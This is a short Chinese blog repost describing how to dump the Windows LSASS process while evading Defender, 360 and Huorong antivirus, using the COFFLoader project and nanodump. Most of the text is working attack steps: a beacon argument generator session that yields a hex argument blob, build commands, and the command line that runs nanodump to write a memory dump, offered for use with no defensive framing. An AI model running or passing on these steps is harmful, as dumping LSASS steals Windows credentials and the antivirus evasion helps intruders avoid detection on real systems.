绕过Defender/360/火绒导出Lsass进程
2023-12-13 09:22:03
项目地址:
https://github.com/trustedsec/COFFLoader
python3 beacon_generate.py
python3 beacon_generate.py Beacon Argument GeneratorBeacon>addint lsass进程IDBeacon>addString output.dmpBeacon>addint 1Beacon>addint 1Beacon>addint 0Beacon>addint 1Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>generateb'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'Beacon>
编译文件
cd COFF-master
make
落地执行:
xxxxxxxxxx COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
defender:
文章来源:https://blog.csdn.net/weixin_65550121/article/details/134790132
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!